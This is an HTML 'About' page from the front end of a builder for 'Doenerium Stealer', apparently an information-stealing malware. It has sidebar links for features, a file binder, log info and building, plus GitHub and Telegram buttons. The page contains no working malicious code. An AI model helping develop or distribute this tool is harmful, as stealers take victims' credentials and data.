<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8" />
    <link rel="stylesheet" href="style/style_about.css">
    <link href='https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css' rel='stylesheet'>
    <title>Doenerium Stealer Builder | t.me/doenerium69</title>
</head>

<body>
    <!-- Sidebar -->
    <nav class="sidebar">
        <div class="logo-menu">
            <h2 class="logo">Doenerium Stealer</h2>
            <i class="bx bx-menu toggle-btn"></i>
        </div>
        <ul class="list">
            <li class="list-item">
                <a href="index.html">
                    <i class='bx bx-grid-alt'></i>
                    <span class="link_name" style="--i:1">Features</span>
                </a>
            </li>
            <li class="list-item">
                <a href="binder.html">
                    <i class='bx bx-merge'></i>
                    <span class="link_name" style="--i:2">Binder</span>
                </a>
            </li>
            <li class="list-item">
                <a href="info.html">
                    <i class='bx bx-detail bx-flip-horizontal'></i>
                    <span class="link_name" style="--i:3">Log info</span>
                </a>
            </li>
            <li class="list-item">
                <a href="build.html">
                    <i class="bx bx-check-shield"></i>
                    <span class="link_name" style="--i:4">Build</span>
                </a>
            </li>
            <li class="list-item active">
                <a href="about.html">
                    <i class='bx bx-info-circle bx-flashing'></i>
                    <span class="link_name" style="--i:5">About</span>
                </a>
            </li>
        </ul>
    </nav>

    <div class="container">
        <div class="maintitle">
            <h1><i class='bx bx-message-rounded-dots'></i> About</h1>
        </div>
        <div class="text-background">
            <b><p id="about-text"></p></b>
        </div>
    </div>
    <div class="button-container">
        <button class="linkButton" id="github-link"><i class='bx bxl-github'></i></button>
        <button class="linkButton" id="telegram-link"><i class='bx bxl-telegram'></i></button>
    </div>
    <script src="scripts/script_about.js"></script>
</body>

</html>
